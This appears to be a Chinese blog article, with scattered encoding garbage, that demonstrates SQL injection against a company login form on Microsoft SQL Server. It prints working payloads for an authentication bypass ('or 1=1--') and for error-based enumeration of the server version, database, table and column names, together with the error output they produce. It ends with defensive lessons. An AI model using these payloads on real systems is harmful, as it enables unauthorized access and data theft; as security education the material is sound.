本文分析了SQL注入全過程。分享給大家供大家參考����,具體如下:
初步注入--繞過驗證�,直接登錄
公司網(wǎng)站登陸框如下:
可以看到除了賬號密碼之外���,還有一個公司名的輸入框����,根據(jù)輸入框的形式不難推出SQL的寫法如下:
復制代碼 代碼如下:
SELECT * From Table WHERE Name='XX' and Password='YY' and Corp='ZZ'
我發(fā)現(xiàn)前兩者都做一些檢查�����,而第三個輸入框卻疏忽了,漏洞就在這里!注入開始�,在輸入框中輸入以下內(nèi)容:
用戶名亂填�����,密碼留空,這種情況下點擊登錄按鈕后竟然成功登錄了。
我們看一下最終的SQL就會找到原因:
復制代碼 代碼如下:
SELECT * From Table WHERE Name='SQL inject' and Password='' and Corp='' or 1=1--'
從代碼可以看出���,前一半單引號被閉合,后一半單引號被 “--”給注釋掉,中間多了一個永遠成立的條件“1=1”,這就造成任何字符都能成功登錄的結(jié)果�����。而Sql注入的危害卻不僅僅是匿名登錄�����。
中級注入--借助異常獲取信息
現(xiàn)在我們在第三個輸入框中寫入:
‘or 1=(SELECT @@version) –
如下:
后臺的SQL變成了這樣:
SELECT * From Table WHERE Name='SQL inject' and Password='' and Corp=''or 1=(SELECT @@VERSION)--'
判斷條件變成了1=(SELECT @@VERSION),
這個寫法肯定會導致錯誤,但出錯正是我們想要的。點擊登錄后,頁面出現(xiàn)以下信息:
Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2008 (SP3) - 10.0.5500.0 (X64) Sep 21 2011 22:45:45
Copyright (c) 1988-2008 Microsoft Corporation Developer Edition (64-bit)
on Windows NT 6.1 <X64> (Build 7601: Service Pack 1) ' to data type int.
可怕的事情出現(xiàn)了,服務器的操作系統(tǒng)和SQL Server版本信息竟然通過錯誤顯示出來���。
危害擴大--獲取服務器所有的庫名、表名�、字段名
接著���,我們在輸入框中輸入如下信息:
復制代碼 代碼如下:
t' or 1=(SELECT top 1 name FROM master..sysdatabases where name not in (SELECT top 0 name FROM master..sysdatabases))--
此時發(fā)現(xiàn)第三個輸入框有字數(shù)長度的限制��,然而這種客戶端的限制形同虛設,
直接通過Google瀏覽器就能去除�。
點擊登錄��,返回的信息如下:
Conversion failed when converting the nvarchar value 'master' to data type int.
數(shù)據(jù)庫名稱“master”通過異常被顯示出來!依次改變上面SQL語句中的序號�����,
就能得到服務器上所有數(shù)據(jù)庫的名稱�����。
接著��,輸入信息如下:
復制代碼 代碼如下:
b' or 1=(SELECT top 1 name FROM master..sysobjects where xtype='U' and name not in (SELECT top 1 name FROM master..sysobjects where xtype='U'))--
得到返回信息如下:
Conversion failed when converting the nvarchar value 'spt_fallback_db' to data type int.
我們得到了master數(shù)據(jù)庫中的第一張表名:“spt_fallback_db”,
同上���,依次改變序號,可得到該庫全部表名�。
現(xiàn)在我們以“spt_fallback_db”表為例����,嘗試獲取該表中所有的字段名��。在輸入框中輸入以下代碼:
復制代碼 代碼如下:
b' or 1=(SELECT top 1 master..syscolumns.name FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='spt_fallback_db');
于是,得到錯誤提示如下:
"Conversion failed when converting the nvarchar value 'xserver_name' to data type int.";
這樣第一個字段名“xserver_name”就出來了,依次改變序號��,就能遍歷出所有的字段名���。
最終目的--獲取數(shù)據(jù)庫中的數(shù)據(jù)
寫到這里���,我們已知通過SQL注入能獲取全部的數(shù)據(jù)庫�����,表�,及其字段���,為了防止本文完全淪為注入教程�,獲取數(shù)據(jù)的代碼就不再描述,而這篇文章的目的也已達到�����,SQL注入意味著什么�����?意味著數(shù)據(jù)庫中所有數(shù)據(jù)都能被盜取��。
當知道這個危害以后�����,是否還能有人對SQL注入漏洞置之不理?
結(jié)語
關于安全性����,本文可總結(jié)出一下幾點:
1. 對用戶輸入的內(nèi)容要時刻保持警惕。
2. 只有客戶端的驗證等于沒有驗證����。
3. 永遠不要把服務器錯誤信息暴露給用戶��。
除此之外,我還要補充幾點:
1. SQL注入不僅能通過輸入框���,還能通過Url達到目的。
2. 除了服務器錯誤頁面�����,還有其他辦法獲取到數(shù)據(jù)庫信息�。
3. 可通過軟件模擬注入行為,這種方式盜取信息的速度要比你想象中快的多。
4. 漏洞跟語言平臺無關。
注:相關教程知識閱讀請移步到MSSQL教程頻道���。
